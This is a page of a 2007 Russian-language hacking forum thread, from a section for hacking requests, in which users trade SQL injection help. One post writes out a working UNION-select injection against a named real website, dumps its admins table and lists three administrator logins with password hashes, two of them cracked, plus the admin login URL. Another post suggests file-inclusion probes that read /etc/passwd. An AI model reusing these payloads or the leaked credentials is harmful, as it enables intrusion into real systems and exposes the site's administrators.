ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > SЕО/Финансовые задачи/Социальные сети > Покупка, Продажа, Обмен > Просьбы о взломах
Перезагрузить страницу Помощь Sql Иньекции.
   
 
Страница 3 из 41 < 1 2 3 4 5 6 7 13 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #21  
Старый 12.04.2007, 18:58
Lancellot
Участник форума
Регистрация: 09.08.2006
Сообщений: 157
Провел на форуме:
1583810

Репутация: 56
По умолчанию
Здраствуйте!
Да бы не создавать новую тему ..задам вопрос тут))
Столкнулся с проведением скуль инькции в PostgreSQL
Есть маса вопросов...прочитал статью Spyder'a и остались непонятные нюансы!
Короче подобрал столбцы
Код:
null,null...
при подстановке числа появляется чистый
экран и на месте наверное где должно быть число видно только(.....)-троеточие!Так же само и с выводом таблиц ...они выводятся только ввиде (....) как сделать чтобы их было видно????
Извиняюсь за может не корректный вопросенг но очень надо спс за ранее !=))
Может функциею to_char(числа) только не пойму как?
Последний раз редактировалось Lancellot; 12.04.2007 в 19:01..
 

  #22  
Старый 12.04.2007, 19:38
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию
Цитата:
прочитал статью Spyder'a
Неудивительно.
url дай.
 

  #23  
Старый 12.04.2007, 20:08
L0rd_Ha0S
Участник форума
Регистрация: 25.01.2006
Сообщений: 158
Провел на форуме:
1000724

Репутация: 361
По умолчанию
To ShadOS
Цитата:
В Linux на основе ядер 2.2.x и более ранних они хранились в /etc/passwd, а файла /etc/shadow ещё не было. Хотя сейчас такие встретить очень сложно. Да и алгоритм шифрования там не такой уж и надёжный =)))
Они и сейчас там могут храниться, даже с ядром 2.6.x
Код:
/sbin/shadowconfig on | off
 

  #24  
Старый 12.04.2007, 20:11
Lancellot
Участник форума
Регистрация: 09.08.2006
Сообщений: 157
Провел на форуме:
1583810

Репутация: 56
По умолчанию
Url не дам бикоз на очень популярном сайте=))
Пока нехочу палится и всетаки можно что нить зделать с этим???
 

  #25  
Старый 12.04.2007, 20:20
Lancellot
Участник форума
Регистрация: 09.08.2006
Сообщений: 157
Провел на форуме:
1583810

Репутация: 56
По умолчанию
Ну лан здесь мне ничего не должен ))
Ну хотябы к примеру можно было сказать что да как =\
 

  #26  
Старый 12.04.2007, 20:26
Lancellot
Участник форума
Регистрация: 09.08.2006
Сообщений: 157
Провел на форуме:
1583810

Репутация: 56
По умолчанию
Так я читал ...хоть скажите можно то эти таблицы на экран вывести?
 

  #27  
Старый 13.04.2007, 01:05
Rebel
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию
У меня тогда еще один маленький вопрос по поводу SQLInjection:
Есть скрипт, которому передается параметр - имя php-файла, которое берется из директории на сайте: site.ru/dir/
Можно ли как-то запустить с помощью этого удаленный сценарий? При том, что magic quotes включены и залить в эту самую директорию, как и в любую другую ничего нельзя...
 

  #28  
Старый 13.04.2007, 08:43
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию
Цитата:
Сообщение от neval  
http://cards.tut.by/holidays.php?event=-
немного не там, но:
Код:
http://cards.tut.by/index.php?d=-1+union+select+1,2,3,4,5,6/*&m=4
это вывод

Код:
http://cards.tut.by/index.php?d=-1+union+select+1,2,3,4,5,6+from+admins/*&m=4
подобрал таблицу 'admins'

Код:
http://cards.tut.by/index.php?d=-1+union+select+1,2,3,4,5,concat(login,0x3a,password)+from+admins/*&m=4
логин:пасс одного из админов
остальных перебираем лимитом
Код:
http://cards.tut.by/index.php?d=-1+union+select+1,2,3,4,5,concat(login,0x3a,password)+from+admins+limit+0,1/*&m=4
Цитата:
alesya:5aa0fa5819ba07df
vitovt:2e782c85379a326e
zettich:773359240eb9a1d9
mysql4-hash, перебор passwordspro или другими тулзами, удачи.

админка: _http://cards.tut.by/admin/login.php

//upd:
2e782c85379a326e = 12345
773359240eb9a1d9 = 123
нужно расшифровать #1 (:
Последний раз редактировалось n1†R0x; 13.04.2007 в 08:53..
 

  #29  
Старый 13.04.2007, 09:43
p-range
Участник форума
Регистрация: 05.02.2006
Сообщений: 168
Провел на форуме:
749524

Репутация: 715
Отправить сообщение для p-range с помощью ICQ
По умолчанию
только не пойму причем тут sql-injection... похоже на php-include, хотя...
ты порбовал подставлять вместо этих значений левые?
например:
Цитата:
?page=/etc/passwd
?page=/etc/passwd%00
и т.д.
а вообще учи php и читай https://forum.antichat.ru/thread6296.html
 

  #30  
Старый 13.04.2007, 10:05
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию
2 Lancellot, скинь ссылку мне в ПМ или в аську постучи =\
Последний раз редактировалось Koller; 13.04.2007 в 12:14..
 
 
Страница 3 из 41 < 1 2 3 4 5 6 7 13 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
ПомогитЕ !!! подалуста найти кряк гейлордфакерЪ Болталка 2 30.08.2007 14:48
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ